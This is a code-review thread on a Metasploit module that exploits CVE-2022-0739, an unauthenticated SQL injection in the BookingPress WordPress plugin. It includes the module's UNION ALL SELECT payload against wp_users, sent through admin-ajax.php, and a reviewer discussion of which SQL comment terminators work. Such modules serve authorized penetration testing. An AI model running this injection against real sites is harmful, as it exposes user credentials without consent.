modules/auxiliary/gather/wp_bookingpress_category_services_sqli.rb

```diff
@@ -0,0 +1,124 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+
+  include Msf::Auxiliary::Scanner
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::SQLi
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Wordpress BookingPress bookingpress_front_get_category_services SQLi',
+        'Description' => %q{
+          The BookingPress WordPress plugin before 1.0.11 fails to properly sanitize user supplied POST data before it is used in
+          a dynamically constructed SQL query via the bookingpress_front_get_category_services AJAX action (available to
+          unauthenticated users), leading to an unauthenticated SQL Injection.
+        },
+        'Author' => [
+          'cyllective', # discovery
+          'jheysel-r7' # module
+        ],
+        'References' => [
+          [ 'URL', 'https://github.com/destr4ct/CVE-2022-0739'],
+          [ 'WPVDB', '388cd42d-b61a-42a4-8604-99b812db2357'],
+          [ 'CVE', '2022-0739']
+        ],
+        'License' => MSF_LICENSE,
+        'DisclosureDate' => '2022-02-28',
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS]
+        }
+      )
+    )
+
+    register_options([
+      OptString.new('TARGETURI', [ true, 'The webpage that bookingPress is running on', '/bookingpress/' ])
+    ])
+  end
+
+  def check
+    @nonce = get_user_nonce
+    return Exploit::CheckCode::Unknown if @nonce == 'Unable to get wp-nonce for an unauthenticated user'
+
+    @sqli = get_sqli_object
+
+    return Exploit::CheckCode::Vulnerable if @sqli.test_vulnerable
+
+    Exploit::CheckCode::Safe
+  end
+
+  def generate_vars_post(sqli)
+    {
+      'action' => 'bookingpress_front_get_category_services', # vulnerable action,
+      '_wpnonce' => @nonce,
+      'category_id' => 1,
+      'total_service' => "#{rand(100..10000)}#{sqli}"
+    }
+  end
+
+  def get_sqli_object
+    create_sqli(dbms: MySQLi::Common, opts: { hex_encode_strings: true }) do |payload|
+      res = send_request_cgi({
+        'method' => 'POST',
+        'uri' => normalize_uri('/wp-admin/admin-ajax.php'),
+        'vars_post' =>
+            generate_vars_post(") UNION ALL SELECT (#{payload}),456,789,12,34,56,78,90,77 from wp_users-- -")
```

Comment:
According to https://dev.mysql.com/doc/refman/8.0/en/comments.html#:~:text=MySQL%20Server%20supports%20three%20comment,newline%2C%20and%20so%20on), you only need to add at least one whitespace character after the `--` characters for it to take effect. Therefore this may work:

```suggestion
            generate_vars_post(") UNION ALL SELECT (#{payload}),456,789,12,34,56,78,90,77 from wp_users-- ")
```

Also if `#` is an allowed character we could simplify this to just this:

```
generate_vars_post(") UNION ALL SELECT (#{payload}),456,789,12,34,56,78,90,77 from wp_users#")
```

Reply:
I've tested both of those suggestions and unfortunately neither of them work. The SQLi seems to be rather particular and needs to end in `wp_users-- -`

Reply:
Hmm well was worth a shot, thanks for checking 👍 Will mark this as resolved.